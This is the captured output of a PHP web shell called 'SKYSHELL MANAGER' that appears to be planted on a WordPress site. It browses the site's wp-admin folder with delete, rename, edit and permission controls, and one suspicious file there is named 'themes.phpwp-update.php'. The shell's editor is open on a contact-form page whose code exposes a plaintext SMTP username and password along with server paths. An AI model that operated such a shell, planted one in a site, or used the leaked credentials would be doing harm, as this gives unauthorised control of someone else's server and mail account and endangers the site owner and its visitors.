📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: contact.php
<!DOCTYPE html> <html lang="en"> <!-- Basic --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <!-- Mobile Metas --> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <!-- Site Metas --> <title>Tech Teamgrow</title> <meta name="keywords" content=""> <meta name="description" content=""> <meta name="author" content=""> <!-- Site Icons --> <link rel="shortcut icon" href="images/fav.ico" type="image/x-icon" /> <link rel="apple-touch-icon" href="images/apple-touch-icon.png"> <!-- Design fonts --> <link href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700" rel="stylesheet"> <!-- Bootstrap core CSS --> <link href="css/bootstrap.css" rel="stylesheet"> <!-- FontAwesome Icons core CSS --> <link href="css/font-awesome.min.css" rel="stylesheet"> <!-- Custom styles for this template --> <link href="style.css" rel="stylesheet"> <!-- Responsive styles for this template --> <link href="css/responsive.css" rel="stylesheet"> <!-- Colors for this template --> <link href="css/colors.css" rel="stylesheet"> <!-- Version Tech CSS for this template --> <link href="css/version/tech.css" rel="stylesheet"> <script src="https://www.google.com/recaptcha/api.js" async defer></script> <script type="text/javascript"> var onloadCallback = function() { grecaptcha.render('html_element', { 'sitekey' : '6LcjRRQaAAAAAOIeTgyNDSQb5TpiMAaNhgCNBa8S' }); }; </script> <style> .accordion { background-color: #eee; color: #444; cursor: pointer; padding: 18px; width: 100%; border: none; text-align: left; outline: none; font-size: 15px; transition: 0.4s; } .active, .accordion:hover { background-color: #ccc; } .panel { padding: 0 18px; display: none; background-color: white; overflow: hidden; } </style> </head> <body> <div id="wrapper"> <header class="tech-header header"> <div class="container-fluid"> <nav class="navbar navbar-toggleable-md navbar-inverse fixed-top bg-inverse"> <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarCollapse" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12"> <div class="row"> <div class="col-md-8"> <a class="navbar-brand" href="index.php"><img src="images/logo3.png" alt=""></a> </div> <div class="col-md-4"> <div class="collapse navbar-collapse" id="navbarCollapse"> <ul class="navbar-nav"> <li class="nav-item"> <a class="nav-link" href="index.php">Home</a> </li> <li class="nav-item"> <a class="nav-link" href="reviews.php">REVIEWS</a> </li> <li class="nav-item"> <a class="nav-link" href="faq.php">FAQ</a> </li> <li class="nav-item"> <a class="nav-link" href="disclosure.php">DISCLOSURE</a> </li> <li class="nav-item"> <a class="nav-link" href="contact.php">Contact Us</a> </li> </ul> </div> </div> </div> </div> </nav> </div><!-- end container-fluid --> </header><br><!-- end market-header --> <section class="section wb"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="page-wrapper"> <h2>Contact Us</h2><br> <div class="row"> <div class="col-lg-5"> <h4>Email:</h4> <p>contact@techteamgrow.org</p> <h4>Tel:</h4> <p>202 388 0213 </p> <h4>Address: </h4> <p>1277 Barnaby Ter SE, Washington, DC 20032 USA.</p> </div> <div class="col-lg-7"> <form class="form-wrapper" action="contact.php" method="post"> <input type="text" name="name" class="form-control" placeholder="Your name"> <input type="email" name="email" class="form-control" placeholder="Email address"> <input type="text" name="phone" class="form-control" placeholder="Phone"> <input type="text" name="subject" class="form-control" placeholder="Subject"> <textarea name="message" class="form-control" placeholder="Your message"></textarea> <div id="recaptcha" class="g-recaptcha" data-sitekey="6LcjRRQaAAAAAOIeTgyNDSQb5TpiMAaNhgCNBa8S" required></div><br> <button type="submit" name="Submit" class="btn btn-primary">Send <i class="fa fa-envelope-open-o"></i></button> </form> <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer> </script> <?php //subscribe form if (isset($_POST['Submit'])){ $name=$_REQUEST['name']; $email=$_REQUEST['email']; $message=$_REQUEST['message']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ include_once('/var/www/html/wxwpsite/techantivirus/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@techteamgrow.org'; $mail->Password = 'Gu!26uabdg&%123'; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name //$mail->From = "vinothkumar@webberax.com"; //$mail->FromName = "vinoth"; $mail->setFrom('contact@techteamgrow.org', 'Tech Teamgrow'); //To address and name $mail->addAddress($email, $name, $message); //$mail->addAddress('vinothkumar@webberax.com', 'hello'); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@techteamgrow.org", "Reply"); //CC and BCC //$mail->addCC("vinothkumar@gmail.com"); //$mail->addBCC("bcc@example.com"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "Tech Teamgrow [Contact Replay]"; $mail->Body = "<p>This message confirms that you have successfully submitted.</p></br> <p>Thank you!</p></br> <i>This e-mail was sent from a contact form on (http://techteamgrow.org)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Mailer Error: "; } else { echo "Success! check your email."; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@techteamgrow.org'; $mail2->Password = 'Gu!26uabdg&%123'; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@techteamgrow.org', 'Tech Teamgrow'); $mail2->addAddress('contact@techteamgrow.org', 'Tech Teamgrow'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted contact details on your website <strong><br> Name : $name<br> Email : $email<br> Message: $message<br>"; $mail2->send(); } } ?> </div> </div> </div><!-- end page-wrapper --> </div><!-- end col --> </div><!-- end row --> </div><!-- end container --> </section> <footer class="footer"> <div class="container"> <div class="row"> <div class="col-lg-7"> <div class="widget"> <div class="footer-text text-left"> <a href="index.php"><img src="images/logo3.png" alt="" class="img-fluid"></a> <p>Tech Teamgrow Blog is a technology blog, we sharing marketing, news and gadget articles.</p> <hr class="invis"> <div class="newsletter-widget text-left"> <form class="form-inline"> <input type="text" class="form-control" placeholder="Enter your email address"> <button type="submit" class="btn btn-primary">SUBMIT</button> </form> </div><!-- end newsletter --> </div><!-- end footer-text --> </div><!-- end widget --> </div><!-- end col --> <div class="col-lg-3 col-md-12 col-sm-12 col-xs-12"> <div class="widget"> <div class="link-widget"> <ul> <li><a href="terms.php">Terms Of Service</a></li> <li><a href="privacy.php">Privacy Policy</a></li> <li><a href="cookie.php">Cookie Policy</a></li> <li><a href="disclosure.php">Disclosure</a></li> <li><a href="faq.php">FAQ</a></li> </ul> </div><!-- end link-widget --> </div><!-- end widget --> </div><!-- end col --> <div class="col-lg-2 col-md-12 col-sm-12 col-xs-12"> <div class="widget"> <div class="link-widget"> <ul> <li><a href="subscribe.php">Subscribe</a></li> <li><a href="about.php">About Us</a></li> <li><a href="contact.php">Help</a></li> <li><a href="unsubscribe.php">Opt-Out</a></li> </ul> </div><!-- end link-widget --> </div><!-- end widget --> </div><!-- end col --> </div> <div class="row"> <div class="col-md-12 text-center"> <br> <div class="copyright">© Techteamgrow.org. All Rights Reserved.</div> </div> </div> </div><!-- end container --> </footer><!-- end footer --> <div class="dmtop">Scroll to Top</div> </div><!-- end wrapper --> <!-- Core JavaScript ================================================== --> <script src="js/jquery.min.js"></script> <script src="js/tether.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/custom.js"></script> </body> </html>
Save